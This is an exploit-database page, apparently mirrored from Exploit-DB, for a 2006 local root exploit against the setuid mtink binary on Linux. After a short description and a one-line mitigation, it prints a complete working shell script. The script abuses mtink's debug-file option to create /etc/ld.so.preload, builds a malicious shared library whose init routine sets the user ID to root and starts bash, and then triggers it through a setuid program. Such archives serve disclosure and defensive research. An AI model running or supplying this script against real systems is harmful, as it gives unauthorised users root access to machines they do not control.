header-logo
Suggest Exploit
vendor:
N/A
by:
karol@wiesek.pl
7,2
CVSS
HIGH
Local Privilege Escalation
269
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2006

mtink libXm local root exploit

This exploit uses a setuid binary, mtink, to create a shared library file, lib.so, which is then loaded by the dynamic linker. This shared library contains a function, _init(), which is executed when the library is loaded. This function checks if the real user ID is not 0 and the effective user ID is 0, and if so, it sets the real user ID to 0 and executes a shell. The exploit then creates a file, /etc/ld.so.preload, which contains the path to the shared library, and then executes the setuid binary, which causes the dynamic linker to load the shared library.

Mitigation:

Remove the setuid bit from the mtink binary, or remove the mtink binary from the system.
Source

Exploit-DB raw data:

#!/bin/sh
echo
echo "mtink libXm local root exploit"
echo "* karol@wiesek.pl *"
echo
umask 000
export DEBUG_FILE="/etc/ld.so.preload"
cat > /tmp/lib.c << _EOF
#include <unistd.h>
void _init(void)
{
	if (getuid()!=0 && geteuid()==0)
	{
		setuid(0);
		unlink("/etc/ld.so.preload");
		execl("/bin/bash", "bash", 0);
	}
}
_EOF
/usr/bin/gcc -o /tmp/lib.o -c /tmp/lib.c
/usr/bin/ld -shared -o /tmp/lib.so /tmp/lib.o
/usr/bin/mtink
echo "/tmp/lib.so" > /etc/ld.so.preload
/bin/ping

# milw0rm.com [2006-08-08]

Navigation

Suggest Exploit

Services By CQR